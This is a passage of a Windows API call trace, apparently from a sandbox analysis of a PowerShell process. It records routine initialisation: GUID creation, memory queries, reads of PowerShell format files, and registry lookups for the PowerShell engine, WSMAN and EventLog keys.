	[0379.797] CoCreateGuid (in: pguid=0x14d290 | out: pguid=0x14d290*(Data1=0x2cd55577, Data2=0x8390, Data3=0x425c, Data4=([0]=0xa1, [1]=0x1b, [2]=0x5f, [3]=0xd7, [4]=0x97, [5]=0xb2, [6]=0x9e, [7]=0xbd))) returned 0x0
	[0379.797] VirtualQuery (in: lpAddress=0x14bc40, lpBuffer=0x14cb00, dwLength=0x30 | out: lpBuffer=0x14cb00*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0379.798] CoCreateGuid (in: pguid=0x14d290 | out: pguid=0x14d290*(Data1=0x984729f8, Data2=0x28a2, Data3=0x4804, Data4=([0]=0x9d, [1]=0xda, [2]=0xb6, [3]=0xef, [4]=0x40, [5]=0x44, [6]=0x73, [7]=0x1d))) returned 0x0
	[0379.798] CoCreateGuid (in: pguid=0x14d290 | out: pguid=0x14d290*(Data1=0x6bbb5d12, Data2=0xe291, Data3=0x49a4, Data4=([0]=0xbd, [1]=0xb1, [2]=0x7a, [3]=0x5d, [4]=0x5a, [5]=0x16, [6]=0x41, [7]=0x65))) returned 0x0
	[0379.798] CoCreateGuid (in: pguid=0x14d290 | out: pguid=0x14d290*(Data1=0xadd103e, Data2=0x905b, Data3=0x49ff, Data4=([0]=0xbf, [1]=0xe6, [2]=0x3b, [3]=0x1b, [4]=0x3f, [5]=0x1b, [6]=0x6, [7]=0x53))) returned 0x0
	[0379.798] CoCreateGuid (in: pguid=0x14d290 | out: pguid=0x14d290*(Data1=0x282ef3ca, Data2=0xccd5, Data3=0x41da, Data4=([0]=0xa2, [1]=0xe8, [2]=0x42, [3]=0xb8, [4]=0xd4, [5]=0xf6, [6]=0x61, [7]=0x3a))) returned 0x0
	[0379.798] CoCreateGuid (in: pguid=0x14d290 | out: pguid=0x14d290*(Data1=0x175a19f0, Data2=0xddbd, Data3=0x4623, Data4=([0]=0xac, [1]=0xc9, [2]=0xc6, [3]=0xa2, [4]=0xcc, [5]=0x15, [6]=0x37, [7]=0x58))) returned 0x0
	[0379.798] VirtualQuery (in: lpAddress=0x14bc40, lpBuffer=0x14cb00, dwLength=0x30 | out: lpBuffer=0x14cb00*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0379.798] CoCreateGuid (in: pguid=0x14d290 | out: pguid=0x14d290*(Data1=0xa572fb89, Data2=0xff14, Data3=0x4d27, Data4=([0]=0xba, [1]=0x89, [2]=0xf6, [3]=0x82, [4]=0xee, [5]=0xf4, [6]=0x60, [7]=0x8a))) returned 0x0
	[0379.798] CoCreateGuid (in: pguid=0x14d290 | out: pguid=0x14d290*(Data1=0x84c3c582, Data2=0x2554, Data3=0x400a, Data4=([0]=0x83, [1]=0x45, [2]=0x12, [3]=0xfa, [4]=0xac, [5]=0x2e, [6]=0xac, [7]=0x14))) returned 0x0
	[0379.798] VirtualQuery (in: lpAddress=0x14bcb0, lpBuffer=0x14cb70, dwLength=0x30 | out: lpBuffer=0x14cb70*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0379.799] VirtualQuery (in: lpAddress=0x14bcb0, lpBuffer=0x14cb70, dwLength=0x30 | out: lpBuffer=0x14cb70*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0379.799] VirtualQuery (in: lpAddress=0x14bcb0, lpBuffer=0x14cb70, dwLength=0x30 | out: lpBuffer=0x14cb70*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0379.799] VirtualQuery (in: lpAddress=0x14bcb0, lpBuffer=0x14cb70, dwLength=0x30 | out: lpBuffer=0x14cb70*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0379.799] SetErrorMode (uMode=0x1) returned 0x1
	[0379.799] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x300
	[0379.799] SetErrorMode (uMode=0x1) returned 0x1
	[0379.799] GetFileType (hFile=0x300) returned 0x1
	[0379.800] ReadFile (in: hFile=0x300, lpBuffer=0x303f750, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cfd8, lpOverlapped=0x0 | out: lpBuffer=0x303f750*, lpNumberOfBytesRead=0x14cfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0379.800] ReadFile (in: hFile=0x300, lpBuffer=0x303f750, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cfd8, lpOverlapped=0x0 | out: lpBuffer=0x303f750*, lpNumberOfBytesRead=0x14cfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0379.801] ReadFile (in: hFile=0x300, lpBuffer=0x303f750, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cfd8, lpOverlapped=0x0 | out: lpBuffer=0x303f750*, lpNumberOfBytesRead=0x14cfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0379.801] ReadFile (in: hFile=0x300, lpBuffer=0x303f750, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cfd8, lpOverlapped=0x0 | out: lpBuffer=0x303f750*, lpNumberOfBytesRead=0x14cfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0379.801] ReadFile (in: hFile=0x300, lpBuffer=0x303f750, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cfd8, lpOverlapped=0x0 | out: lpBuffer=0x303f750*, lpNumberOfBytesRead=0x14cfd8*=0x8b4, lpOverlapped=0x0) returned 1
	[0379.801] ReadFile (in: hFile=0x300, lpBuffer=0x303eb6c, nNumberOfBytesToRead=0x34c, lpNumberOfBytesRead=0x14cfd8, lpOverlapped=0x0 | out: lpBuffer=0x303eb6c*, lpNumberOfBytesRead=0x14cfd8*=0x0, lpOverlapped=0x0) returned 1
	[0379.801] ReadFile (in: hFile=0x300, lpBuffer=0x303f750, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cfd8, lpOverlapped=0x0 | out: lpBuffer=0x303f750*, lpNumberOfBytesRead=0x14cfd8*=0x0, lpOverlapped=0x0) returned 1
	[0379.801] SetErrorMode (uMode=0x1) returned 0x1
	[0379.801] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x14cf80 | out: lpFileInformation=0x14cf80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67eea05d, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67eea05d, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe601915b, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x48b4)) returned 1
	[0379.801] SetErrorMode (uMode=0x1) returned 0x1
	[0379.801] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d068 | out: phkResult=0x14d068*=0x300) returned 0x0
	[0379.802] RegQueryValueExW (in: hKey=0x300, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14cfec, lpData=0x0, lpcbData=0x14cfe8*=0x0 | out: lpType=0x14cfec*=0x1, lpData=0x0, lpcbData=0x14cfe8*=0x56) returned 0x0
	[0379.802] CoTaskMemAlloc (cb=0x5a) returned 0x42efa0
	[0379.802] RegQueryValueExW (in: hKey=0x300, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14cfbc, lpData=0x42efa0, lpcbData=0x14cfb8*=0x56 | out: lpType=0x14cfbc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x14cfb8*=0x56) returned 0x0
	[0379.802] CoTaskMemFree (pv=0x42efa0) 
	[0379.802] RegCloseKey (hKey=0x300) returned 0x0
	[0379.802] CoCreateGuid (in: pguid=0x14d290 | out: pguid=0x14d290*(Data1=0x29f9d346, Data2=0xdd08, Data3=0x4f0b, Data4=([0]=0x9e, [1]=0x33, [2]=0x52, [3]=0x81, [4]=0xc2, [5]=0xd, [6]=0xd4, [7]=0x3b))) returned 0x0
	[0379.802] CoCreateGuid (in: pguid=0x14d290 | out: pguid=0x14d290*(Data1=0x33987e90, Data2=0x5edf, Data3=0x41c2, Data4=([0]=0xa8, [1]=0x9b, [2]=0x67, [3]=0x5e, [4]=0xcc, [5]=0x1c, [6]=0xd7, [7]=0x75))) returned 0x0
	[0379.802] SetErrorMode (uMode=0x1) returned 0x1
	[0379.803] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\registry.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x300
	[0379.803] SetErrorMode (uMode=0x1) returned 0x1
	[0379.803] GetFileType (hFile=0x300) returned 0x1
	[0379.803] ReadFile (in: hFile=0x300, lpBuffer=0x307d538, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cfd8, lpOverlapped=0x0 | out: lpBuffer=0x307d538*, lpNumberOfBytesRead=0x14cfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0379.804] ReadFile (in: hFile=0x300, lpBuffer=0x307d538, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cfd8, lpOverlapped=0x0 | out: lpBuffer=0x307d538*, lpNumberOfBytesRead=0x14cfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0379.804] ReadFile (in: hFile=0x300, lpBuffer=0x307d538, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cfd8, lpOverlapped=0x0 | out: lpBuffer=0x307d538*, lpNumberOfBytesRead=0x14cfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0379.804] ReadFile (in: hFile=0x300, lpBuffer=0x307d538, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cfd8, lpOverlapped=0x0 | out: lpBuffer=0x307d538*, lpNumberOfBytesRead=0x14cfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0379.804] ReadFile (in: hFile=0x300, lpBuffer=0x307d538, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cfd8, lpOverlapped=0x0 | out: lpBuffer=0x307d538*, lpNumberOfBytesRead=0x14cfd8*=0xe98, lpOverlapped=0x0) returned 1
	[0379.804] ReadFile (in: hFile=0x300, lpBuffer=0x307cb38, nNumberOfBytesToRead=0x168, lpNumberOfBytesRead=0x14cfd8, lpOverlapped=0x0 | out: lpBuffer=0x307cb38*, lpNumberOfBytesRead=0x14cfd8*=0x0, lpOverlapped=0x0) returned 1
	[0379.804] ReadFile (in: hFile=0x300, lpBuffer=0x307d538, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cfd8, lpOverlapped=0x0 | out: lpBuffer=0x307d538*, lpNumberOfBytesRead=0x14cfd8*=0x0, lpOverlapped=0x0) returned 1
	[0379.804] SetErrorMode (uMode=0x1) returned 0x1
	[0379.804] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\registry.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x14cf80 | out: lpFileInformation=0x14cf80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67eea05d, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67eea05d, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe603f2b9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x4e98)) returned 1
	[0379.804] SetErrorMode (uMode=0x1) returned 0x1
	[0379.805] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d068 | out: phkResult=0x14d068*=0x300) returned 0x0
	[0379.805] RegQueryValueExW (in: hKey=0x300, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14cfec, lpData=0x0, lpcbData=0x14cfe8*=0x0 | out: lpType=0x14cfec*=0x1, lpData=0x0, lpcbData=0x14cfe8*=0x56) returned 0x0
	[0379.805] CoTaskMemAlloc (cb=0x5a) returned 0x42efa0
	[0379.805] RegQueryValueExW (in: hKey=0x300, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14cfbc, lpData=0x42efa0, lpcbData=0x14cfb8*=0x56 | out: lpType=0x14cfbc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x14cfb8*=0x56) returned 0x0
	[0379.805] CoTaskMemFree (pv=0x42efa0) 
	[0379.805] RegCloseKey (hKey=0x300) returned 0x0
	[0379.805] VirtualQuery (in: lpAddress=0x14bb00, lpBuffer=0x14c9c0, dwLength=0x30 | out: lpBuffer=0x14c9c0*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0379.805] CoCreateGuid (in: pguid=0x14d290 | out: pguid=0x14d290*(Data1=0x8be8306d, Data2=0x739f, Data3=0x42a0, Data4=([0]=0x81, [1]=0xb6, [2]=0x9e, [3]=0xc9, [4]=0x30, [5]=0x2d, [6]=0x42, [7]=0x7))) returned 0x0
	[0379.806] CoCreateGuid (in: pguid=0x14d290 | out: pguid=0x14d290*(Data1=0x257a8d35, Data2=0x780d, Data3=0x48b2, Data4=([0]=0x97, [1]=0xdf, [2]=0x19, [3]=0xc8, [4]=0x4, [5]=0x4, [6]=0x2e, [7]=0x43))) returned 0x0
	[0379.821] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d030, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0379.821] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d030, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0379.827] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x14d030, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0379.828] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x14d030, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0379.831] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14d030, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0379.831] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14d030, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0380.223] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x14d030, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0380.223] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x14d030, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0380.226] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x14d030, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0380.227] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x14d030, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0380.711] CoTaskMemAlloc (cb=0x104) returned 0x1b6ff8b0
	[0380.711] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b6ff8b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0380.711] CoTaskMemFree (pv=0x1b6ff8b0) 
	[0380.712] CoTaskMemAlloc (cb=0x104) returned 0x1b6ff8b0
	[0380.712] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b6ff8b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0380.712] CoTaskMemFree (pv=0x1b6ff8b0) 
	[0380.713] CoTaskMemAlloc (cb=0x104) returned 0x1b6ff8b0
	[0380.713] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b6ff8b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0380.713] CoTaskMemFree (pv=0x1b6ff8b0) 
	[0380.714] CoTaskMemAlloc (cb=0x104) returned 0x1b6ff8b0
	[0380.714] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b6ff8b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0380.714] CoTaskMemFree (pv=0x1b6ff8b0) 
	[0380.720] CoTaskMemAlloc (cb=0x104) returned 0x1b6ff8b0
	[0380.720] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b6ff8b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0380.720] CoTaskMemFree (pv=0x1b6ff8b0) 
	[0380.722] CoTaskMemAlloc (cb=0x104) returned 0x1b6ff8b0
	[0380.722] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b6ff8b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0380.722] CoTaskMemFree (pv=0x1b6ff8b0) 
	[0380.722] CoTaskMemAlloc (cb=0x104) returned 0x1b6ff8b0
	[0380.722] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b6ff8b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0380.722] CoTaskMemFree (pv=0x1b6ff8b0) 
	[0380.724] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d278 | out: phkResult=0x14d278*=0x300) returned 0x0
	[0380.725] RegQueryInfoKeyW (in: hKey=0x300, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x14d17c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x14d178, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x14d17c*=0x6, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x14d178*=0x3, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0380.726] CoTaskMemFree (pv=0x0) 
	[0380.726] CoTaskMemAlloc (cb=0x204) returned 0x3c94a0
	[0380.726] RegEnumValueW (in: hKey=0x300, dwIndex=0x0, lpValueName=0x3c94a0, lpcchValueName=0x14d228, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="StackVersion", lpcchValueName=0x14d228, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0380.726] CoTaskMemFree (pv=0x3c94a0) 
	[0380.726] CoTaskMemAlloc (cb=0x204) returned 0x3c94a0
	[0380.726] RegEnumValueW (in: hKey=0x300, dwIndex=0x1, lpValueName=0x3c94a0, lpcchValueName=0x14d228, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="SupportsCompatListeners", lpcchValueName=0x14d228, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0380.726] CoTaskMemFree (pv=0x3c94a0) 
	[0380.726] CoTaskMemAlloc (cb=0x204) returned 0x3c94a0
	[0380.726] RegEnumValueW (in: hKey=0x300, dwIndex=0x2, lpValueName=0x3c94a0, lpcchValueName=0x14d228, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="UpdatedConfig", lpcchValueName=0x14d228, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0380.726] CoTaskMemFree (pv=0x3c94a0) 
	[0380.726] RegQueryValueExW (in: hKey=0x300, lpValueName="StackVersion", lpReserved=0x0, lpType=0x14d20c, lpData=0x0, lpcbData=0x14d208*=0x0 | out: lpType=0x14d20c*=0x1, lpData=0x0, lpcbData=0x14d208*=0x8) returned 0x0
	[0380.726] CoTaskMemAlloc (cb=0xc) returned 0x3c8b80
	[0380.726] RegQueryValueExW (in: hKey=0x300, lpValueName="StackVersion", lpReserved=0x0, lpType=0x14d1dc, lpData=0x3c8b80, lpcbData=0x14d1d8*=0x8 | out: lpType=0x14d1dc*=0x1, lpData="2.0", lpcbData=0x14d1d8*=0x8) returned 0x0
	[0380.726] CoTaskMemFree (pv=0x3c8b80) 
	[0380.748] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d1c8 | out: phkResult=0x14d1c8*=0x32c) returned 0x0
	[0380.748] RegQueryInfoKeyW (in: hKey=0x32c, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x14d0cc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x14d0c8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x14d0cc*=0x6, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x14d0c8*=0x3, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0380.749] CoTaskMemFree (pv=0x0) 
	[0380.749] CoTaskMemAlloc (cb=0x204) returned 0x3c94a0
	[0380.749] RegEnumValueW (in: hKey=0x32c, dwIndex=0x0, lpValueName=0x3c94a0, lpcchValueName=0x14d178, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="StackVersion", lpcchValueName=0x14d178, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0380.749] CoTaskMemFree (pv=0x3c94a0) 
	[0380.749] CoTaskMemAlloc (cb=0x204) returned 0x3c94a0
	[0380.749] RegEnumValueW (in: hKey=0x32c, dwIndex=0x1, lpValueName=0x3c94a0, lpcchValueName=0x14d178, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="SupportsCompatListeners", lpcchValueName=0x14d178, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0380.749] CoTaskMemFree (pv=0x3c94a0) 
	[0380.749] CoTaskMemAlloc (cb=0x204) returned 0x3c94a0
	[0380.749] RegEnumValueW (in: hKey=0x32c, dwIndex=0x2, lpValueName=0x3c94a0, lpcchValueName=0x14d178, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="UpdatedConfig", lpcchValueName=0x14d178, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0380.749] CoTaskMemFree (pv=0x3c94a0) 
	[0380.749] RegQueryValueExW (in: hKey=0x32c, lpValueName="StackVersion", lpReserved=0x0, lpType=0x14d15c, lpData=0x0, lpcbData=0x14d158*=0x0 | out: lpType=0x14d15c*=0x1, lpData=0x0, lpcbData=0x14d158*=0x8) returned 0x0
	[0380.749] CoTaskMemAlloc (cb=0xc) returned 0x3c8ba0
	[0380.749] RegQueryValueExW (in: hKey=0x32c, lpValueName="StackVersion", lpReserved=0x0, lpType=0x14d12c, lpData=0x3c8ba0, lpcbData=0x14d128*=0x8 | out: lpType=0x14d12c*=0x1, lpData="2.0", lpcbData=0x14d128*=0x8) returned 0x0
	[0380.749] CoTaskMemFree (pv=0x3c8ba0) 
	[0380.749] CoTaskMemAlloc (cb=0x104) returned 0x1b6ff8b0
	[0380.749] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b6ff8b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0380.749] CoTaskMemFree (pv=0x1b6ff8b0) 
	[0381.223] CoTaskMemAlloc (cb=0x104) returned 0x1b6ff8b0
	[0381.224] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b6ff8b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0381.224] CoTaskMemFree (pv=0x1b6ff8b0) 
	[0381.229] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d1f8 | out: phkResult=0x14d1f8*=0x1cc) returned 0x0
